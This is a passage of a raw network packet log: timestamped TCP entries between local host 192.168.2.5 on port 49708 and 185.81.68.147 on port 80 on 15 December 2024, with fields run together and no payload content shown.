                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.386811018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.387909889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.387962103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.388000965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.388962030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.389095068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.389137030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.390104055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.390201092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.390233040 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.391268015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.391387939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.391463995 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.392433882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.392527103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.392599106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.393599033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.393707037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.393786907 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.394737005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.394865036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.394906998 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.395931959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.396028996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.396063089 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.397090912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.397197962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.397277117 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.398269892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.398384094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.398495913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.399389982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.399509907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.399547100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.400578976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.400629997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.400705099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.401767969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.401884079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.401957989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.402904034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.402997017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.403037071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.404058933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.404102087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.404139042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.405186892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.458139896 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.536441088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.536515951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.536595106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.536961079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.537117004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.537201881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.538177013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.538286924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.538357019 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.539303064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.539407015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.539482117 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.540476084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.540560007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.540657043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.541615963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.541671038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.541748047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.542788029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.542884111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.542957067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.544024944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.544133902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.544213057 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.545181990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.545267105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.545340061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.546252012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.546349049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.546422958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.547413111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.547508001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.547590017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.548584938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.548685074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.548753977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.549748898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.549866915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.549940109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.550885916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.551000118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.551074982 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.552048922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.552198887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.552267075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.553244114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.553347111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.553417921 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.554491997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.554596901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.554660082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.555537939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.555761099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.555830002 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.556704044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.556798935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.556869984 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.557847023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.557977915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.558056116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.559029102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.559135914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.559211969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.560246944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.560350895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.560427904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.561628103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.561745882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.561990023 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.562820911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.562942982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.563016891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.563824892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.563908100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.563990116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.564821005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.564944983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.565009117 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.566028118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.566152096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.566221952 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.567163944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.567239046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.567308903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.568310976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.568418026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.568495989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.569456100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.569603920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.569674969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.570651054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.570817947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.570885897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.571801901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.571906090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.571975946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.572993040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.573112965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.573179960 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.574157953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.574242115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.574317932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.575344086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.575431108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.575503111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.576431990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.576581001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.576647043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.577619076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.577744007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.577812910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.578766108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.578862906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.578933001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.579936981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.580039024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.580101967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.581126928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.581177950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.581245899 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.582294941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.582361937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.582427025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.583422899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.583558083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.583623886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.584606886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.584661961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.584773064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.585916042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.585993052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.586061001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.587025881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.587115049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.587184906 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.588078976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.588160992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.588226080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.589332104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.589478016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.589545012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.590395927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.590481997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.590549946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.591557980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.591759920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.591831923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.592724085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.592812061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.592885971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.593874931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.594038010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.594114065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.595067024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.595089912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.595156908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.596209049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.596262932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.596332073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.597299099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.645648003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.728696108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.728872061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.728945017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.729207993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.729394913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.729480028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.730344057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.730485916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.730551958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.731525898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.731733084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.731806993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.732671022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.732801914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.732868910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.733973980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.733987093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.734071970 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.735021114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.735116005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.735188007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.736159086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.736314058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.736387014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.737423897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.737436056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.737510920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.738569975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.738771915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.738847017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.739774942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.739787102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.739870071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.740940094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.740951061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.741035938 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.741959095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.742079020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.742150068 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.743272066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.743285894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.743380070 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.744486094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.744721889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.744798899 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.746095896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.746108055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.746193886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.746970892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.747183084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.747248888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.747888088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.747965097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.748034954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.748965025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.749030113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.749092102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.750250101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.750329971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.750401974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.751360893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.751615047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.751677990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.752413988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.752618074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.752677917 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.753582954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.753663063 CET8049708185.81.68.147192.168.2.5
